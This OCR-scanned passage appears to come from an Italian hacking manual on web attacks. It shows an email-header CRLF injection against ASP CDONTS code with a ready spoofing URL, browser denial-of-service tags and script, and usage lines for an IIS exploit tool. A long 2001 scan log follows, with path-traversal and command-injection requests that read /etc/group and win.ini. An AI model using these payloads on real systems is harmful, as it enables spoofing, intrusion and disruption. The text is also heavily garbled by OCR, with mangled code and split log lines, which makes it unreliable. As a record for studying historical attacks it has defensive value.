objNewMail.From = "newsletter@company.com" 
objNewMail. To = Request.QueryString("email") 
objNewMail. Subject = "NEWSLETTER" 
objNewMail. Body = "Please find attached the newsletter." 
objNewMail. AttachFile "c:\newsletter.txt", "mailatt.txt" 
objNewMail. Send 



La prima linea crea l'oggetto CDONTS.NEWMAIL mentre le altre settano I parametri relativi 
alle proprietà utilizate per l'invio del messaggio. 

Come potete vedere dal codice di prima i parametri vengono letti mediante delle funzioni ASP 
del tipo Request.QueryString("email") per cui è presupponibile che per l'invio di una nuova 
email l'utente attivi un URL nel seguente modo : 



I valori verranno settati aH'inyterno dei parametri nel seguente modo : 

mail from: newsletter@company.com 
rcpt to: david@ngssoftware.com 
data 

Subject: NEWSLETTER 



e quindi l'email viene inviata. 
Tutta via se si provasse a inviare : 

http: //www. company . com/newsletter . asp?email=victim@spoofed. com%OD%OAdata%OD%OASub 
ject: %20Spoofed! %OD%OA%OD%OAHi, %0D%0AThis%20±s%20a%20spoofed%20emall%0D%0 



La creazione dei parametri sarebbe : 



mail from: newsletter@company.com 
rcpt to: victim@spoofed.com 
data 

Subject: Spoofed! 
Hi, 

This is a spoofed e-mail 
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In questo modo un email verrebbe inviata tramite l'oggetto NEWMAIL 

In alcuni casi potrebbe essere il WEB a creare problemi agli Internet Explorer di chi ci naviga 

sopra. 

Ad esempio il TAG che segue crea un Denaial of Service (Dos) a chi ci naviga sopra (fate 
attenzione che sde riportate il codice dentro ad una pagina WEB per dimostrazione sostituite 
la I di IMG con qualche altra lettera per non fare in modo che chi legge la pagina venga 
colpito dall'attacco DOS): 

<img 

src=Òx0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 o ÒÒÓx0ÙÙOÒÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0Ù 
ÙOÒÉE§E>ÓBààààéààààgè=;o 1 1 1 o ÒÒÒx0ÙÙOÒÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÒÉÈ§ 
eÓBààààéààààgè=;o 1 1 1 o ÓÒÓx0ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÒÉÈ§E>ÓBààààé 
àaààgè=;o 1 1 1 o ÓÒÒx0ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÓÉÉ§PÓBààààéààààgè=;o 
1 1 1 °OÒOx0ÙÙOÒÉE§eÓBààààéààààgè=;o 1 1 1 o ÒÒÒx0ÙÙOÒÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0 
ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÓÉÈ§PÓBààààéààààgè=./o 1 1 1 °ÒÒÓx0ÙÙOÒÉÈ 
§eÓBààààéààààgè=;o 1 1 1 °ÓÒÒx0ÙÙOÒÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÓÉÈ§E>ÓBàààà 
éààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÒÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÓÉÉ§PÓBààaàéàaààgè=; 
o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÓx 
0ÙÙOÒÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉE§tÓBààààéààààgè=./c> 1 1 1 °ÒÒÒx0ÙÙOÒÉ 
È§E>ÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÒÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÒÉÈ§eÓBàà 
ààéàaààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÓÒÒx0ÙÙOÒÉÈ§E>ÓBààààéààààg 
è=}o 1 1 1 °ÒÒOx0ÙÙOoÉÉ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÓÉÈ§PÓBààààéààààgè=;o 1 1 1 °ÒÒ 
Òx0ÙÙOÒÉÉ§eÓBààààéàaààgè=;o 1 1 1 o ÒÒÒx0ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙO 
ÒÉÈ§E>ÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÓÉÉ§PÓBààààéààààgè=J>o 1 1 1 °ÓÒÓx0ÙÙOÓÉÉ§E>Ó 
Bààààéààààgè=;o 1 1 1 °OÒÒx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÒÉÈ§PÓBààààéàà 
ààgè=;o 1 1 1 °ÒÒÒx0TJÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 
°OÒÒx0ÙÙOoÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0Ù 
ÙOÒÉE§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒOx0ÙÙOÒÉE§ 
eÓBààààéààààgè=;o 1 1 1 °OÒÒx0ÙÙOoÉÈ§eÓBààààéààààgè=jfo 1 1 1 °ÓÒÒx0ÙÙOÒÉÉ§E>ÓBààààé 
àaààgè=;o 1 1 1 °ÒÒÓx0ÙÙOÓÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOOÉÉ§eÓBààààéààààgè=;o 
1 1 1 °ÒÒÒx0ÙÙOÓÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0 
ÙÙOÒÉÈ§&ÓBààààéààààgè=;o 1 1 1 °ÓÒÒx0ÙÙOÒÉÈ§PÓBààààéààààgè=./o 1 1 1 °ÒÒOx0ÙÙOÒÉÉ 
§eÓBààààéààààgè=;o 1 1 1 °OÒOx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÓÒÒx0ÙÙOÓÉÈ§E>ÓBàààà 
éaàààgè=;o 1 1 1 °OÒOx0ÙÙOÒÉÈ§6ÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÓÉÈ§E>ÓBààààéààààgè=; 
o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 °ÒÒOx 
0ÙÙOÒÉÉ§eÓBààààéààààgè=;o 1 1 1 °OÒÒx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉ 
È§eÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÒÉÈ§E>ÓBààààéààààgè=;o 1 1 1 °ÓÒÓx0ÙÙOÒÉÉ§t>ÓBàà 
ààéààààgè^o 1 1 1 °OÒOx0ÙÙOÒÉÈ§E>ÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÈ§E>ÓBààààéààààg 
è=}o 1 1 1 °OÒOx0ÙÙOoÉE§eÓBààààéààààgè=;o 1 1 1 o ÒÒÒx0ÙÙOÓÉÉ§PÓBààààéààààgè=;o 1 1 1 °ÒÒ 
Òx0ÙÙOÒÉÈ§eÓBààààéààààgè=;o 1 1 1 °ÒÒÒx0ÙÙOÒÉÈ§E>ÓBààààéààààgè=;o 1 1 1 °ÒÒOx0ÙÙO 
ÒÉÈ§E'ÓBààààéàaààgè=;o 1 1 1 °ÒÒOx0ÙÙOOÉÉ§eÓBààààéààààgè=;o 1 1 1 °OÒOx0ÙÙOoÉÉ§eÓ 
Bààààéààààgè> 



Un altro DOS attack è quello che segue, sempre indirizzato ad Internet Explorer. 

<form name="form"xinput type="text" name="box"xform> 

<script language="javascript"> 
while(true) { document.form.box.value=document.form.box.value + 



Dai files di LOG dei WEB SERVER è possibile raccogliere informazioni legate alle 
metodologie di scanning. 

Alcune di queste stringhe le abbiamo già viste durante i copitoli legati a UNICODE BUG e 
MSADC. 

Il seguente exploit viene usato con la sintassi chge segue. 

. / lls-kabom -t www.victim.vlc 

. / iis-kabom -t www.victim.vic -p proxy.port 

. / iis-kabom www.victim.vic comand variant_number 

./iis-kabom -p proxy.port www.victim.vic comand variant_number 

Options: 
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69warp87.newtel.com [14/Aug/2001 : 12 : 56 : 16 -0400] "QUIT" 501 - 

69warp87.newtel.com [14/Aug/2001 : : 13 : 06:18 -0400] "QUIT" 401 - 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 35 -0400] "GET 

Zn0nexi5tent_file.html HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 35 -0400] "GET 

Zn0nexi5tent_file.html HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 36 -0400] "GET / HTTP/1.0" 401 

468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 36 -0400] "GET 

/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group 
HTTP/1.0" 400 371 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 36 -0400] "GET 

/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/wlnnt/wln . ini 

HTTP/ 1.0" 400 

375 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 37 -0400] "GET 

/. ./../../../. ./etc/group HTTP/1.0" 400 351 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 37 -0400] "GET 

/../../../../. ./winnt/win. ini HTTP/1.0" 400 355 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 37 -0400] "GET 

/../../../../. .winnt/win. ini HTTP/1.0" 400 354 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 37 -0400] "GET 

/.../.../.../.../... /etc/group HTTP/1 .0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 38 -0400] "GET 

/.../.../.../.../.. ./winnt/win. ini HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 38 -0400] "GET 

/../../../../. ./etc/group HTTP/1.0" 400 351 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 38 -0400] "GET 

/../../../../. ./winnt/win. ini HTTP/1.0" 400 355 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 38 -0400] "GET /cgi- 

bin/webdist . cgi ?distloc=; /bin/cat %20/etc/group 
HTTP/ 1.0" 40 
4 284 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 39 -0400] "GET /cgi- 

bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 279 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 39 -0400] "GET /cgi- 

bin/htmlscript? . ./../../../../. . /etc/group 

HTTP/1 .0" 404 28 

3 

69warp87.newtel.com [14/Aug/2001 : : 13 : 07:39 -0400] "GET /cgi- 

bin/php. cgi? /etc/group HTTP/1.0" 404 280 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 39 -0400] "GET /cgi- 

bin/pfdispaly? . . / . . / . . / . . / . . / . . /etc/group 
HTTP/1.0" 404 282 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 40 -0400] "GET /cgi- 
bin/pfdispaly. cgi ? . . /. . / . . /. . / . . /. . /etc/group 
HTTP/1.0" 404 
286 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 40 -0400] "GET /cgi-bin/view- 
source? . ./../../../../. . /etc/group 
HTTP/1 .0" 404 2 
84 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 40 -0400] "GET /cgi- 

bin/htsearch?exclude=%60/etc/group%60 HTTP/1.0" 404 
281 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 41 -0400] "GET 

/ cgi-bin/ infosrch . cgi?cmd=getdoc&db=man&fname= / /bin/cat%20/etc/g 
roup HTTP/1.0" 404 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 41 -0400] "GET /cgi- 
bin/ faxsurvey?/bin/cat%20/etc/group HTTP/1.0" 404 282 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 41 -0400] "GET /cgi- 

bin/counterfiglet/nc/f=; cat %20/etc/group 
HTTP/1.0" 404 307 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 41 -0400] "GET /cgi- 
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HTTP/1 .0" 4 
04 290 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 42 -0400] "GET 
/cgi-bln/calendar/calendar_admln . pi ?conflg= \ cat%20/etc/group / HT 
TP/1 .0" 404 299 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 42 -0400] "GET 

/cg±-bln/poll±t/Poll_It_SSI_v2 . 0 . cgl ?data_dlr=/etc/group%00 HTTP 
/1.0" 404 300 

69warp87.newtel.com [14/Aug/2001 : : 13 : 07:42 -0400] "GET 

/cgl-bln/bb-hostsvc . sh?HOSTSVC=/ . ./../../../../../../. . /etc/grou 
p HTTP/1.0" 404 286 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 42 -0400] "GET 
/cgl-bln/netauth. cgl?cmd=show&page= . ./../../../../../../../. ./et 
c/group HTTP/1.0" 404 284 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 43 -0400] "GET /cgl- 

bin/htgrep?flle=lndex.html&hdr=/etc/group 
HTTP/1.0" 404 279 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 43 -0400] "GET 

/cgl-bln/YaBB .pl?board=news&action=dlsplay&num= . ./. ./. ./. ./. ./. . 
/../.. /etc/group%00 HTTP/1.0" 404 280 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 43 -0400] "GET 
/search97cgl/vtopic?action=v±ew&ViewTemplate= . ./. ./. ./. ./. ./etc/ 
group HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 44 -0400] "GET /cgi- 

bln/multihtml .pi ?multl=/etc/group%OOhtml 
HTTP/1 .0" 404 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 44 -0400] "GET /cgi- 
bin/query?mss=. ./config HTTP/1.0" 404 278 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 44 -0400] "GET /cgl- 

bln/ssl//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group 
HTTP/ 1.0" 40 
0 377 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 44 -0400] "GET /cgi- 
bin/webplus?scrlpt=/ . ./. ./. ./. ./etc/group 
HTTP/1.0" 404 280 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 45 -0400] "GET /cgi- 

bln/webplus . exe?scrlpt=/ . ./. ./. ./. . /etc/group 
HTTP/1.0" 404 
284 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 45 -0400] "GET /cgi- 
bln/webplus . cgl?script=/ . ./../../. . /etc/group 
HTTP/1.0" 404 
284 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 45 -0400] "GET 
/cgl-bln/mmstdod. cgl ?ALTERNATE_TEMPLATES= / %2 0echo%2 OContent—Type 
:%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 HTTP/1.0" 404 284 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 46 -0400] "GET /cgl- 

bln/bbs_forum. cgl?read= . ./. ./. ./. . /etc/group 

HTTP/1.0" 404 

286 

69warp87.newtel.com [14/Aug/2001 : : 13 : 07:46 -0400] "GET /cgl- 

bin/bbs/bbs_forum. cgl?read= . ./. ./. ./. . /etc/group 
HTTP/1 . 0 " 
404 290 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 46 -0400] "GET /cgl-bln/man- 
cgl?%20/etc/group%20 HTTP/1.0" 404 280 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 46 -0400] "GET 
/opendlr.php?requesturl=/etc/group HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 47 -0400] "GET 

/bb_smllles . php ?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi 4 
vZXRjL2dyb3VwAAo HTTP/ 1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 07 : 47 -0400] "GET 

/cgl-bln/talkback.cgl?artlcle=. ./. ./. ./. ./. . /etc/group%00&act±on 
=vlewSmatchvlew=l HTTP/1.0" 404 285 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 07 : 47 -0400] "GET /cgi- 
bin/cal_make.pl?pO=. ./../../../. . /etc/group%00 
HTTP/ 1.0" 40 
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69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


47 


-0400] 


"GET 




/cg±-b±n/alstats/ald±sp3 


.cgi?. ./../. 


/. 


/. 


/. . 


/ /etc/group HTTP 


/1.0" 404 292 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


48 


-0400] 


"GET 


/cgi -bin/t est-cgi 


HTTP/1 .0" 403 285 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


48 


-0400] 


"GET 


/cgi- 


bin/ dumpenv.pl HTTP/1 . 0 ' 


404 283 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


48 


-0400] 


"GET 


/cgi-bin/nph-test- 


cgl HTTP/1.0" 404 285 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


49 


-0400] 


"GET 


/cgi- 


bln/wwwboard . pi HTTP/1 . 0 


" 404 284 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


52 


-0400] 


"GET 


/cgi- 


bln/wwwboard . cgl HTTP/1 . 


0" 404 285 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


52 


-0400] 


"GET 


/cgi -bin/wwwboard 


HTTP/1.0" 404 281 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


53 


-0400] 


"GET 


/cgi -bin/wrap 


HTTP/1 .0" 404 277 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


53 


-0400] 


"GET 


/cgi -bin/wrap . pi 


HTTP/1.0" 404 280 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


53 


-0400] 


"GET 


/cgi-bin/wrap . cgi 


HTTP/1 .0" 404 281 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


53 


-0400] 


"GET 


/cgi -bin/ finger 


HTTP/1.0" 404 279 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


54 


-0400] 


"GET 


/cgi -bin/ finger . pi 


HTTP/1 .0" 404 282 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


54 


-0400] 


"GET 


/cgi- 


bin/ finger . cgi HTTP/1 . 0 ' 


404 283 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


54 


-0400] 


"GET 


/cgi -bin/phf 


HTTP/1 . 0 " 302 290 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


55 


-0400] 


"GET 


/cgi -bin/handler 


HTTP/1 .0" 404 280 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


55 


-0400] 


"GET 


/cgi -bin/info2www 


HTTP/1.0" 404 281 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


55 


-0400] 


"GET 


/cgi- 


bin/textcounter.pl HTTP/1.0" 404 287 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


55 


-0400] 


"GET 


/cgi -bin/gl impse 


HTTP/1 .0" 404 280 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


56 


-0400] 


"GET 


/ cgi-bin/ aglimpse 


HTTP/1 .0" 404 281 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


56 


-0400] 


"GET 


/cgi-bin/webgais 


HTTP/1.0" 404 280 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


56 


-0400] 


"GET 


/cgi -bin/www-sql 


HTTP/1.0" 404 280 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


56 


-0400] 


"GET 


/cgi- 


bin/websendmail HTTP/1 . 0 


" 404 284 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


57 


-0400] 


"GET 


/ cgi-bin/ jj 


HTTP/1 .0" 404 275 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


57 


-0400] 


"GET 


/ cgi-bin/ count . cgi 


HTTP/1.0" 404 282 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


57 


-0400] 


"GET 


/cgi- 


bin/imagemap . exe HTTP/1 . 


0" 404 285 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


58 


-0400] 


"GET 


/catinfo HTTP/1 . 0 " 


401 468 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


58 


-0400] 


"/cgi- 


bin/saint_test_cgi HTTP/1.0" 400 - 














69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


58 


-0400] 


"GET /cgi-bin/csh 


HTTP/1.0" 404 276 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


58 


-0400] 


"GET /cgi-bin/bash 


HTTP/1 .0" 404 277 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


59 


-0400] 


"GET /cgi-bin/zsh 


HTTP/1.0" 404 276 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


59 


-0400] 


"GET /cgi-bin/ash 


HTTP/1 .0" 404 276 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07 


59 


-0400] 


"GET /cgi-bin/ksh 


HTTP/1.0" 404 276 
















69warp87 . newtel . com - - 


[14/Aug/2001 


■13 


07:59 


-0400] 


"GET 


/cgi -bin/ sh 
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69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


00 


-0400] 


"GET 


/egi -bin/perl 


HTTP/1 .0" 404 277 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


00 


-0400] 


"GET 


/cgi-bin/perl . exe 


HTTP/1 .0" 404 281 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


00 


-0400] 


"GET 


/egi -bin/t csh 


HTTP/1.0" 404 277 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


01 


-0400] 


"GET 


/egi- 


wln/uploader . exe HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


01 


-0400] 


"GET 


/egi -dos/args . bat 


HTTP/ 1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


01 


-0400] 


"GET 


/egi-dos/args . cmd 


HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


01 


-0400] 


"GET 


/cgi-shl/win-c- 


sample.exe HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


02 


-0400] 


"GET 


/ shop/product . asp 


HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


02 


-0400] 


"GET 


/ shop/product . ast 


HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


02 


-0400] 


"GET 




/ script s/ c32web . exe/ChangeAdmlnPassword HTTP/1 


.0" 401 


468 




69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


02 


-0400] 


"GET 




/pccsmysqladm/lncs/dbconnect . Ine HTTP/1 . 


0" 


401 


468 






69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


03 


-0400] 


"GET 




/servlet/sunexamples . BBoardServlet HTTP/1.0" 401 468 






69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


03 


-0400] 


"GET 




/_prlvate/shopping_cart .mdb HTTP/1 . 0 


" 401 468 








69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


03 


-0400] 


"GET 




/piranha/ secure/passwd.php3 HTTP/1 . 0 


" 401 468 








69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


04 


-0400] 


"GET 




/scripts/cart32 . exe/cart32clientlist HTTP/1 


.0' 


401 468 




69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


04 


-0400] 


"GET 




/scripts/emurl/RECMAN . dll HTTP/1 . 0 " 


301 


468 








69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


04 


-0400] 


"GET 


/egi- 


bin/ guestbook. egi HTTP/1.0" 404 286 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


04 


-0400] 


"GET 


/egi- 


bin/ guestbook. pi HTTP/1.0" 404 285 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


05 


-0400] 


"GET 


/egi -bin/exci t e 


HTTP/1 .0" 404 279 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


05 


-0400] 


"GET 




/site/eg/source.asp HTTP/1.0" 401 468 












69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


05 


-0400] 


"GET 


/egi -bin/w3- 


msql/ index. html HTTP/1.0" 404 291 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


06 


-0400] 


"GET 


/egi -bin/wai s . pi 


HTTP/1 .0" 404 280 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


06 


-0400] 


"GET 


/egi- 


bin/wais/wais.pl HTTP/1.0" 404 285 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


06 


-0400] 


"GET 




/ddrint/bin/ddiegi . exe HTTP/1 .0" 401 


468 










69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


06 


-0400] 


"GET 


/egi -bin/db2www 


HTTP/1 .0" 404 279 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


07 


-0400] 


"GET 


/egi- 


binZdb2www.exe HTTP/1.0" 404 283 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


07 


-0400] 


"GET 




/search97cgi/vtopic HTTP/1.0" 401 468 












69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


07 


-0400] 


"GET 


/egi -bin/webpl us 


HTTP/1.0" 404 280 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


08 


-0400] 


"GET 


/egi- 


bin/webplus . exe HTTP/1.0" 404 284 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


08 


-0400] 


"GET 


/egi- 


bin/webplus . egi HTTP/1.0" 404 284 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


08 


-0400] 


"GET 


/dsgw/bin/ search 


HTTP/1.0" 401 468 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


08 


-0400] 


"GET 




/pbserver/pbserver . dll HTTP/1 .0" 401 


468 










69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


09 


-0400] 


"GET 


/egi- 


bin/statscon fig.pl HTTP/1.0" 404 287 














69warp87.newtel.com - - [14/Aug/2001 


:13. 


08: 


09 


-0400] 


"GET 


/egi -bin/wwwwais 
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"GET 
401 



69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 09 -0400] 

HTTP/1 .0" 404 275 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 09 -0400] 

query HTTP/1.0" 404 283 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 10 -0400] 
bln/ncommerce3/Exectiacro/orderdspc . d2w/report 
HTTP/1.0" 404 
314 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 10 -0400] 

bln/websync . exe HTTP/ 1.0" 404 284 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 10 -0400] 
HTTP/1.0" 401 468 

69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 11 
HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 11 -0400] 

/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 11 -0400] 

/cfdocs/expeval/openflle.cfm HTTP/1.0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 11 -0400] 
/cfdocs/exampleapp/docs/sourcewlndow.cfm HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 12 -0400] "GET 

/cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 12 -0400] "GET 

/cfdocs/snippets/viewexample.cfm HTTP/1 .0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 12 -0400] "GET 

/CFIDE/Admlnlstrator/startstop.html HTTP/1.0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 13 -0400] 

/llssamples/exalr/howltworks/codebrws . asp HTTP/1 
468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 13 -0400] "GET 

/ilssamples/sdk/asp/docs/codebrws .asp HTTP/1 . 0" 401 468 

69warp87.newtel.com [14/Aug/2001 : 13 : 08 : 13 -0400] "GET 

/ilssamples/exair/howitworks/code . asp HTTP/1 . 0" 401 468 
69warp87.newtel.com - - [14/Aug/2001 : 13 : 08 : 14 -0400] "GET 
/msadc/samples/selector/showcode . asp HTTP/1.0" 401 468 

